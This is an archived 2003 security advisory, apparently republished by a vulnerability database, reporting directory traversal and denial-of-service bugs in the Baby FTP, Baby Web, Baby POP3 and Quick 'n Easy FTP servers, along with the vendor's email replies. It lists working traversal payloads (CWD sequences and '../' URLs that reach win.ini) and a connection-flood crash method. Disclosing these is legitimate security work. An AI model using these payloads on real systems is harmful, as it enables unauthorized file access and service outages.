Vulners
Lucene search
baby.txt
`In this advisorie there are some vulnerabilities i found yesterday for BabyFtp server,Baby web server,Baby Pop3
server and Quick n' easy Ftp.
I informed the Company about these vulnerabilities and here are the e-mails they sent me:
-----------------------------------------------------------------
From [email protected] Wed May 28 21 : 42:08 2003
Return-Path : <[email protected]>
Received : from cardassian.kabelfoon.nl (cardassian.kabelfoon.nl [62.45.45.18]) by localhost.localdomain (8.12.8/8.12.8) with ESMTP id h4SIg6KH025510 for <[email protected]>; Wed, 28 May 2003 21:42:07 +0300
Received : from PABLO (kf-nawij-tg01-0881.dial.kabelfoon.nl [62.45.131.114]) by cardassian.kabelfoon.nl (Postfix) with SMTP id EFAF8BE9F0 for <[email protected]>; Wed, 28 May 2003 20:39:21 +0200 (CEST)
Message-ID : <000f01c32548$73cf3be0$0100a8c0@PABLO>
From : "Pablo" <[email protected]>
To : xxxxxx xxxxxxx <[email protected]>
References : <[email protected]>
ÈÝìá : Re: Multiple Vulnerabilities Found :)
Date : Wed, 28 May 2003 20:39:20 +0200
MIME-Version : 1.0
Content-Type : text/plain; charset="iso-8859-7"
Content-Transfer-Encoding : 8bit
X-Priority : 3
X-MSMail-Priority : Normal
X-Mailer : Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To : "Pablo" <[email protected]>
X-MimeOLE : Produced By Microsoft MimeOLE V6.00.2800.1106
Hi,
Thanks you very much for your report.
First let me say that BabyFtp server, Baby web server, Baby Pop3 server are
NOT real products but just (MFC) sample applications!
They contain even more bugs than you can think of...
As for Quick 'n Easy FTP server: can you make more connections than
configured in 'Max connections' settings?
If so how did you manage to do that?
Regards,
Pablo
Ok, thanks!
It looks like this is related to the size of physical memory, when new
sockets are created in virtual memory it will crash the application... :(
I will take a look at it first thing tomorrow morning.
Regards and keep on hacking...
Pablo
------------------------------------------
Baby FTP 1.2 Multiple Vulnerabilities.
-------------------------------------------
Release Date:
MAY 28, 2003
Systems Affected:
BAby Ftp server Version 1.2
Description:
While i was testing Baby Ftp Server last night i found some vulnerabilities. Let's take a look at the following:
1)The ftp server is vulnerable to directory traversal attack. A remote user can see the whole hard disk
by supplying some strange cwd commands.
2)There is also a DOS attack.if you try to establish multiple connections from the same host on baby Ftp server it will crash.
Let's Dance (Exploit)
--------------------
(1)
You need to supply these CWD commands for a succesful attack:
CWD ...
CWD /...
CWD /......
CWD \...
CWD ...\
CWD .../
(2)
Let's try to establish about 100 connections with the webserver from the same IP:
1 220 Welcome to Baby Ftp server
2 220 Welcome to Baby Ftp server
3 220 Welcome to Baby Ftp server
.
.
.
.
67 220 Welcome to Baby Ftp server
b00m..crash:>
The error message will be: "Unhanled exception(MFC42.DLL):0xC00000005:Access Violation
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Quick n' easy FTP server 1.7 DOS ATTACK
---------------------------------------
Systems Affected:
Quick n' easy FTP server 1.7
Description:
------------
There is one D0s attack (yes again!) in Quick n' easy FTP server 1.7. By making a big numer of connections you can crash the
server:>
Exploit:
--------
The same as above...try to establish a big number of connections using the same Ip and the server will crash.
BABY web server 1.5 Multiple bugs
---------------------------------------
Systems Affected:
BAby Web server 1.5
Description:
------------
While i was checking Baby web server version 1.5 i found some stupid bugs.The first is a directory traversal bug and the second
a Dos attack.Let's find out what is going on!
Exploit:
--------
(1)You can read whatever you want on the remote server by supplying some /.././ on you Web browser:
http://[server]/../../../../windows/win.ini
http://[server]\..\..\..\windows/win.ini
etc..etc..etc...
(2)
By supplying again a very big number of connections the web server will crash:) It seems that all the products of
www.pablovandermeer.nl have the same problem.
BABY Pop3 server Version 1.0 DOS attack
---------------------------------------
Systems Affected:
BABY Pop3 server version 1.0
Description:
------------
There is the same Dos vulnerability here:P You can crash the server by supplying multiple connections from the same host.
-----------------------------------------------
vulnerabilities found and tested by dr_insane
-----------------------------------------------
Feedback
---------
Please send suggestions and Comments to:
[email protected]
http://members.lycos.co.uk/r34ct/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2003 00:00Current
7.4High risk
Vulners AI Score7.4